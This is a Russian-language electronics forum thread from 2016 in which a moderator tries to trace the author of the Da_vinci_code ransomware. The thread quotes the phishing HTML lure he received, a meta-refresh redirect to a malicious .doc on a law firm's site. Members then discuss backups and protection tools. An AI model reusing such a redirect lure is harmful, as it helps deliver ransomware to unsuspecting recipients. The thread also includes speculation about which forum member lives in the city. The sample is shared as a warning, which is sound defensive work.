ESpec - мир электроники для профессионалов
БИБЛИОТЕКА   •   ФАЙЛЫ   •   ФОРУМ   •   ССЫЛКИ   •   ЧАТ
Регистрация  •  Вход
Поиск  •  Пользователи  •  Справка


Есть кто с г. Тирасполь?

  Список форумов » Свободное общение

Следующая тема · Предыдущая тема
АвторСообщение
Oлег 
Модератор
<B>Модератор</B>
Сообщения: 3983
Oлег
 
Сообщение #1 от 14/11/2016 15:45 цитата  
Привет всем! Если есть кто с данного города отзовитесь.
Очень интересует одна Юридическая компания, а если быть более точным то человек который держит их сайт.

ДОБАВЛЕНО 14/11/2016 18:49

Позже объясню, сейчас нет времени. Но дело важное.
Oлег 
Модератор
<B>Модератор</B>
Сообщения: 3983
Oлег
 
Сообщение #2 от 14/11/2016 20:39 цитата  
Никого нету? Печально.
Это связано с шифровальщиком Da_vinci_code
Нашел зацепку как найти автора этого вируса, а далее заинтересованные лица могут его наказать. Достаточно только потянуть за ниточку. Неужели он никого на Украине не достал?
С России мы не можем подать запрос, Украина откажет в содействии. А тем временем этот ублюдок наносит ущерб, вымогает деньги, и считает что он безнаказан.
Yuritsh 
Фанат форума
Сообщения: 18498
Yuritsh
 
Сообщение #3 от 14/11/2016 20:58 цитата  
Удивляюсь, как можно хранить важные документы в одном месте, и в одном экземпляре.
Oлег 
Модератор
<B>Модератор</B>
Сообщения: 3983
Oлег
 
Сообщение #4 от 14/11/2016 21:15 цитата  
Умудряются. Он у нас одну организацию пресссует. Они уже потеряли все документы у отдела кадров. Сейчас я настроил автобекапы по сети. Даже если опять словят, не страшно.
Вот сайт на котором есть вредоносный документ http://jurcomp.com
Вот такой код от того урода на почту пришел в html файле:
Код:
<html>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<meta http-equiv="refresh" content="1; url=http://jurcomp.com/admin/ckeditor/dоcumentоbоrоt.doc">
<title>Документооборот</title>
<body>
<center></center>
Накладаня готова, пожалуйста ознакомьтесь с ней в скачанном файле. спасибо.
</html>

Название файла в целях вашей безопасности изменил.
Эта сволочь хоть бы писать без ошибок научилась. Антивирусы молчат. В данном doc документе вшит ява скрипт, который загружает тело вируса на машину жертвы. Касперскому уже отправил.
По доступу к сайту можно отловить эту мразь. Не думаю что сайт взломан. Но даже если и так , отследить левые коннекты не сложно с админом сайта.
Yuritsh 
Фанат форума
Сообщения: 18498
Yuritsh
 
Сообщение #5 от 14/11/2016 21:27 цитата  
Oлег писал:
Сейчас я настроил автобекапы по сети.
Ну вроде пишут, что он шифрует всё, до чего дотянется. По крайней мере вставленные флешки, и внешние диски он шифрует.

Советуют на будущее ставить CryptoPrevent

Цитата:
Как предотвратить заражение компьютера вирусом-шифровальщиком da_vinci_code ?

Большинство современных антивирусных программ уже имеют встроенную систему защиты от проникновения и активизации вирусов-шифровальщиков. Более того, существуют и специализированные защитные программы. Например это CryptoPrevent.

Скачайте CryptoPrevent и запустите. Следуйте указаниям мастера установки. Когда инсталлирование программы завершиться, вам будет показано окно выбора уровня защиты, как показано на следующем примере.

Нажмите кнопку Apply для активации защиты.
Oлег 
Модератор
<B>Модератор</B>
Сообщения: 3983
Oлег
 
Сообщение #6 от 14/11/2016 21:50 цитата  
Поставил уже)
Он шифрует все что достанет, но я умно сделал, а тот комп который бекапит, не имеет доступ в сеть, и права только на чтение .
teledok 
Фанат форума
Сообщения: 3751
teledok
 
Сообщение #7 от 14/11/2016 22:16 цитата  
Oлег писал:
Никого нету? Печально.
Это связано с шифровальщиком Da_vinci_code
Нашел зацепку как найти автора этого вируса, а далее заинтересованные лица могут его наказать. Достаточно только потянуть за ниточку. Неужели он никого на Украине не достал?
С России мы не можем подать запрос, Украина откажет в содействии. А тем временем этот ублюдок наносит ущерб, вымогает деньги, и считает что он безнаказан.
Это ж Молдова. При чём тут Украина?
SASHATOD 
Фанат форума
Сообщения: 9882
SASHATOD
 
Сообщение #8 от 14/11/2016 22:35 цитата  
Oлег, Холявщик (Вован) с Монитора каэтся с Тирасполя.

ДОБАВЛЕНО 14/11/2016 23:36

Yuritsh, Не помнишь он кажется тут тоже регился?
Yuritsh 
Фанат форума
Сообщения: 18498
Yuritsh
 
Сообщение #9 от 14/11/2016 22:41 цитата  
Знать бы, под каким ником он регился.

Это не он? http://monitor.espec.ws/users/3511.html
SASHATOD 
Фанат форума
Сообщения: 9882
SASHATOD
 
Сообщение #10 от 14/11/2016 22:42 цитата  
Oлег, Извини мимо он с Бендер но это рядом.
киев 
Прислонившийся
Сообщения: 6952
киев
 
Сообщение #11 от 14/11/2016 22:52 цитата  
Цитата:
Oлег, Холявщик (Вован) с Монитора каэтся с Тирасполя.

На монике он Холявщик, а здесь Безобразник. Я тож сразу про него подумал, но таки ж он бендеровец, из Бендер то есть.
Yuritsh 
Фанат форума
Сообщения: 18498
Yuritsh
 
Сообщение #12 от 14/11/2016 22:56 цитата  
http://monitor.espec.ws/section10/post378859.html#378859 сегодня заходил.
Oлег 
Модератор
<B>Модератор</B>
Сообщения: 3983
Oлег
 
Сообщение #13 от 15/11/2016 06:38 цитата  
Спасибо парни улыбка Написал Классику. Так же отписал разработчику сайту, интересно что он ответит. На его ж репутацию это может повлиять.
Ой, ошибся со страной, взаимодействуют ли меж собой правоохранительный органы России и Молдовы. Сегодня узнаю.
Oлег 
Модератор
<B>Модератор</B>
Сообщения: 3983
Oлег
 
Сообщение #14 от 15/11/2016 20:12 цитата  
Эх, и там прокси оказался. Мимо.
Зато админу сайт помог вылечить улыбка
Yuritsh 
Фанат форума
Сообщения: 18498
Yuritsh
 
Сообщение #15 от 15/11/2016 20:48 цитата  
Oлег писал:
Эх, и там прокси оказался. Мимо.
Ну если чел сумел написать такую заразу, то наверное он умеет и заметать следы.

Перейти: 
 Следующая тема · Предыдущая тема
Показать/скрыть Ваши права в разделе

Интересное от ESpec


Другие темы раздела Свободное общение



ESpec   •   Библиотека   •   Файлы   •   Форум   •   Ссылки   •   Чат
Rambler's Top100 Рейтинг@Mail.ru liveinternet.ru RadioTOP